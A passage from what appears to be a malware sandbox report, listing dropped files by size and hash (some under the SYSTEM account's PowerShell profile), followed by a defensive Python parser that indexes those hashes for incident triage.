SHA5122d0f64c5ca2e1ea9af44e5c7b836efe7d02feb29915f148ce2e69ab70435a57dbe15f26a2e096d414f1cdad87066c8486397cf3de982afbe1aea74bc4def0475
-
Filesize
6.7MB
MD5b119ea556def66eaa9f751a650b45af0
SHA1daf3fa0325b110183d0a233b4b0d1875f0b49ca8
SHA25653c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4
SHA51208dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4
-
Filesize
982KB
MD5390ac3f2b52e0f0d283f9aaf5f6b1661
SHA18237596cbd07487c309fb51f424d7b08be11a2b0
SHA2568083b98be75e90531952fc20da8e437f8b5523a3735fb96cfd1eed4e894e39cb
SHA5128101f5d56a9b74732715c18146d88338c208ff1cb16498f6f95ba295784e7049f6558af4088f9d4ad99ab9d090cd612b56a837243474396dd0943ea7ed52a632
-
Filesize
4.6MB
MD52c8ab707b79399f1cbaf2cd17003d614
SHA1034bd6bbd7123627ca202b6b35b9018261fc03d5
SHA256c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede
SHA512d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
259KB
MD5ab1dbed7cd6c1bf01ab77d12d1b86cd8
SHA1ccfd0f691e8e75ed0fb9a436032167cc633ce68b
SHA256b5389bf868f62fcbdebccd4a8014ab6b3c0164de09913f34d6fa18f36cbcb1a5
SHA5121f83592156ee5479024aad34b1f856826c869758172d44b5d3052cf7b076ece37fde55a1d6ec572aceeac13172b48c65733c008f066fade447ec807837d26587
-
Filesize
1.7MB
MD5eee5ddcffbed16222cac0a1b4e2e466e
SHA128b40c88b8ea50b0782e2bcbb4cc0f411035f3d5
SHA2562a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54
SHA5128f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc
-
Filesize
6KB
MD5e08514b62d586e3f54f9951b8a91fc4d
SHA122ededc0b5b4ca5bbe5ca381df05333aeab00c48
SHA256abded86c72a94406d1696920b852e68b594086ea3efcf3ce2fd40d09cdd895a6
SHA512415089cc8ad411a908d00b193c17d6786575a62345de0b14b00e662ee651198874fa55b7332e351aae37522b4494bf799e65893055ca9a598dd89207255f2c30
-
Filesize
40B
MD55f5e97ba939baf708a1b2b1bb7acbb7e
SHA1194294ed2caec5608dbe4b9f3d00bbf9f738050e
SHA256733e6e77f50f0e5e30df357748ae8cddde48e6a35e50ec77f84765e8e19215a8
SHA51294acf10f3b6bf77c5ed01932ee3607deede25cbb453cf3ab7a8ae5f5775d2152d88508b991efacf264d5e7b51880de59fbdf0ed7932ee940cd223d1de8b9e800
-
Filesize
128B
MD511bb3db51f701d4e42d3287f71a6a43e
SHA163a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA2566be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2
-
Filesize
7.5MB
MD5aaab26342c7e93c5b29fcaec60dd84d9
SHA1a02b822ee13767ca224a37494adda8ad3b34db92
SHA25630b64050f5874a74cb1ddc70578c6c30d70edd4d43f8b91f4597aa3d1a405648
SHA512ad01fdbac1fa2b3ccf62d4c76d458bb5288a6e1664a6188417e5872104474567765ff364e66c5a66d350f921c542a43fde1ba301af60b76bac35d0c7541c9097
-
Filesize
4.1MB
MD5ba0d14f5874f5d2e7fb5c6a1a9b675dc
SHA1a99194ec87f921dfc74890dda2b5db6372a44547
SHA2566d1698c7355202b13ab98193ca2b3cf9e159de306885b630c7a5714a0aa651df
SHA51288f8357c673b49f0896721a68fc330497579d082b772f8640db96198c92edb5aca5239f39b6a427f748d49d2288ce876c1458f321d1ceb88adec1bc437385741
-
Filesize
403KB
MD59cd8f017fce108d15a3da05ad68dc88d
SHA18a934caca9bc4aae78caf22ffb40fa52d0539bd2
SHA25641cfcd320e71a9703685c95859dec2262cc459c3a5d6d4e2e4379d8f9695c854
SHA512bd6fbdab2e4a67f09afb5c88441410ff5efa567da2ae0089da210f68f79e87ac7b04da43e710ec4fcf25ceef28dc13bcdff6335f37e35017f6b0039c53c4dc5b
-
Filesize
4.1MB
MD5fd4e39b84976a233a5ec92fbe255ff48
SHA129fca043ec03807ad528fa222e9bb4039c0a64aa
SHA2568004dce352977242b0ac40ede92b2eda494a22a3cb1366ae7336810f4cd364bc
SHA5124f87776eb6687f636d6a8b0d931d1e789c49c624d9519a1afc1eceef385d4da3d9da1a1e7e28e4a8beb50de76d9bfab8eefc37479ea2148cbc681c0551c4a0dd
-
Filesize
372KB
MD5e2a6c1f58b137874e490b8d94382fcdb
SHA171529c5d708091b1e1a580227dc52e62a140edd1
SHA2564801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437
SHA51224d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff
-
Filesize
437KB
MD57960d8afbbac06f216cceeb1531093bb
SHA1008221bf66a0749447cffcb86f2d1ec80e23fc76
SHA256f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84
SHA51235d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147
-
Filesize
5.1MB
MD5bd950871b09f9fcfa3466fb1b2b5d556
SHA10722e0ddae63ea95c95fb2fa49300c452de8ddc1
SHA256e73bcab8e2404cb75d65a8ccd9f256d87ad77f432663f04487628afd12a30051
SHA512f7cad1bc16d3aa8456c15f5c57828afa5d6d764aed2b23b71ac8f95ad51796be17e14943c7c97133414f7f92c91b741f3c773ed6266597e9c78d7970ccaee2b7
-
Filesize
3.2MB
MD54204b9d4c4df5c4b4d67922db24f342a
SHA19255b5e94028f3f55adda2576d60bd39452eaf08
SHA25662cd7b447bdee3ec1670c92d9585e1fddbaa5d4ee824dee8f15940005bf95414
SHA5120b4ed4d6397c9f34cf2c72d9c581a6e5d94eabf395da0010073b1600883dac6fcc48c1606ffee29952bd60707caf03b8a6d6cf644b2ac668306b4a418d726423
-
Filesize
7KB
MD55b423612b36cde7f2745455c5dd82577
SHA10187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c
-
Filesize
4.1MB
MD5c4557771f0454d0924cff29fe81f2fb1
SHA1905dfbc56726538788fde25dfc364509b220f3f3
SHA256c8dba8d9f5446614284942a20ccc34a939be7ef2183f7da8e89ed4848a11cbaf
SHA5125822384e112b7c92e1d0c2bf3d4b6017f0560c8f6fa0608881e7bd3f04acd8eab9a02df6ae8c13c22cd813aabbc6137cd27c0f72d847c0ac526a0fd7dd562e43
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD5b7730734a19453b63c20f753914ec7e0
SHA16fb18889f2a3f9ae06447abfc8fdf9ad6e119661
SHA256ee77e6e66a80a6657be8c355021ea18520da80a54ac61915c681fef7163c6b74
SHA512c53972c47b738821be5c59dc282eb7ac61db18294ccad806fd592f8c51d3732dcc1137699a638767546d3ecc496761cef34a1c471631203c93f4e4cefad25bd8
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize19KB
MD529e28e9da37e4900bc6113254ee685c3
SHA19ff27a74c5e5c77a4d6b12d3582a04b2a527bfef
SHA256b747fa492595344414e5f008b1092086c3a1a6e92cb03886be17eddbedb267cd
SHA512c618bf7587fe0d90d4b27348de1c6ed4e6fe9a5118509c1970201fcc425544589b8372eef45fe5468c693a25168522264d88672bc15d63346d91fde5b97d12ce
-
Filesize
127B
MD58ef9853d1881c5fe4d681bfb31282a01
SHA1a05609065520e4b4e553784c566430ad9736f19f
SHA2569228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA5125ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
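The dropped-file listing above is a flat sequence of records: an optional path, a size (either fused as `Filesize136B` or as a `Filesize` label with the value on the next line), four digest lines with the label fused to the hex (`MD5238d...`, `SHA10953...`), and a `-` separator. The Python below is an added example, not part of the sandbox report or of any sandbox tooling: it parses that layout into records, validates each digest by its expected length (which is also what disambiguates `SHA1` from `SHA512` when the label is fused to the hex), builds a hash index so a file recovered from another host can be matched on whichever digest an EDR alert or log happens to provide, and flags records written under `\config\systemprofile\`, the LocalSystem account's profile directory. That flag is an interpretation of the path, not a field in the report: artifacts such as the CLR usage log `powershell.exe.log` and `StartupProfileData-Interactive` appearing there mean a 32-bit PowerShell ran under the SYSTEM account. The embedded sample is three records copied verbatim from the listing; the report rounds sizes, so parsed byte counts are approximate.

```python
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Hex-digest lengths, used to validate and disambiguate fused "LABELhex" lines.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_SIZE_RE = re.compile(r"^(\d+(?:\.\d+)?)\s*([KMG]?B)$", re.IGNORECASE)
_UNIT = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
# Profile directory of the LocalSystem account (interpretation, not a report field).
SYSTEM_PROFILE = "\\config\\systemprofile\\"

# Sample input: three records copied verbatim from the listing (one with a path,
# one path-less with the split "Filesize" line, one under the SYSTEM profile).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
Filesize
10KB
MD5014de499a6e8a79751040cebb2248add
SHA1e9cb08c31fff55bfada1bf01b1f5630d43b78587
SHA2560c71582a4de3581f7d143d27737c4233bb1fc444d93359309d5101a655b3b51f
SHA5124e4f2605be24d48fe5da70f7cb79085f058e75c055dd727ad1cec3ecbb9d61d95923a3341cfa6f6cf3872f47966becc047bd927ead076eac4268eb7f2d723a81
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
"""


@dataclass
class Dropped:
    path: Optional[str] = None   # None when the report omits the path
    size_text: str = ""
    size_bytes: int = 0          # approximate: the report rounds sizes
    digests: Dict[str, str] = field(default_factory=dict)  # label -> lowercase hex


def parse_size(text: str) -> int:
    """'136B' -> 136, '10KB' -> 10240, '2.5MB' -> 2621440 (1024-based units)."""
    m = _SIZE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparseable size: {text!r}")
    return int(float(m.group(1)) * _UNIT[m.group(2).upper()])


def split_digest(line: str) -> Optional[Tuple[str, str]]:
    """Split a fused line such as 'SHA10953...' into ('SHA1', '0953...').
    The label is chosen by the digest length that fits, so 'SHA512...' is
    never misread as SHA1 followed by '512...'. Returns None for non-digest lines."""
    labels = [lab for lab in DIGEST_LEN if line.startswith(lab)]
    for label in labels:
        rest = line[len(label):].lower()
        if len(rest) == DIGEST_LEN[label] and all(c in "0123456789abcdef" for c in rest):
            return label, rest
    if labels:
        raise ValueError(f"malformed digest line: {line!r}")
    return None


def parse_report(text: str) -> List[Dropped]:
    """Parse the flat dropped-file listing; '-' separates records."""
    records, cur, pending_size = [], Dropped(), False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if pending_size:  # value of a split "Filesize" line
            cur.size_text, cur.size_bytes, pending_size = line, parse_size(line), False
        elif line == "-":
            if cur.digests:
                records.append(cur)
            cur = Dropped()
        elif line.startswith("Filesize"):
            rest = line[len("Filesize"):].strip()
            if rest:
                cur.size_text, cur.size_bytes = rest, parse_size(rest)
            else:
                pending_size = True
        elif (d := split_digest(line)) is not None:
            cur.digests[d[0]] = d[1]
        elif cur.path is None and not cur.digests:  # first line of a record is its path
            cur.path = line
        else:
            raise ValueError(f"unexpected line: {line!r}")
    if cur.digests:  # last record may lack a trailing '-'
        records.append(cur)
    return records


def build_index(records: List[Dropped]) -> Dict[Tuple[str, str], List[Dropped]]:
    """Index every (label, hex) pair so a file can be matched on any one digest."""
    idx: Dict[Tuple[str, str], List[Dropped]] = {}
    for r in records:
        for label, hx in r.digests.items():
            idx.setdefault((label, hx), []).append(r)
    return idx


def digests_of_bytes(data: bytes) -> Dict[str, str]:
    """All four digests of a recovered artifact, keyed like the report."""
    return {label: hashlib.new(label.lower(), data).hexdigest() for label in DIGEST_LEN}


def lookup(index: Dict[Tuple[str, str], List[Dropped]], digests: Dict[str, str]) -> List[Dropped]:
    """Records matching any supplied digest; label and hex case are ignored."""
    hits: List[Dropped] = []
    for label, hx in digests.items():
        for r in index.get((label.upper(), hx.lower()), []):
            if r not in hits:
                hits.append(r)
    return hits


def written_as_system(records: List[Dropped]) -> List[Dropped]:
    # Files dropped under the LocalSystem profile: the writer ran as SYSTEM.
    return [r for r in records if r.path and SYSTEM_PROFILE.lower() in r.path.lower()]
```

To triage a file pulled from another host, read it and call `lookup(build_index(parse_report(report_text)), digests_of_bytes(data))`; a hit returns the report record with the original drop path, which is usually more useful than the hash alone. Path-less records still match, since every digest is indexed independently of the path.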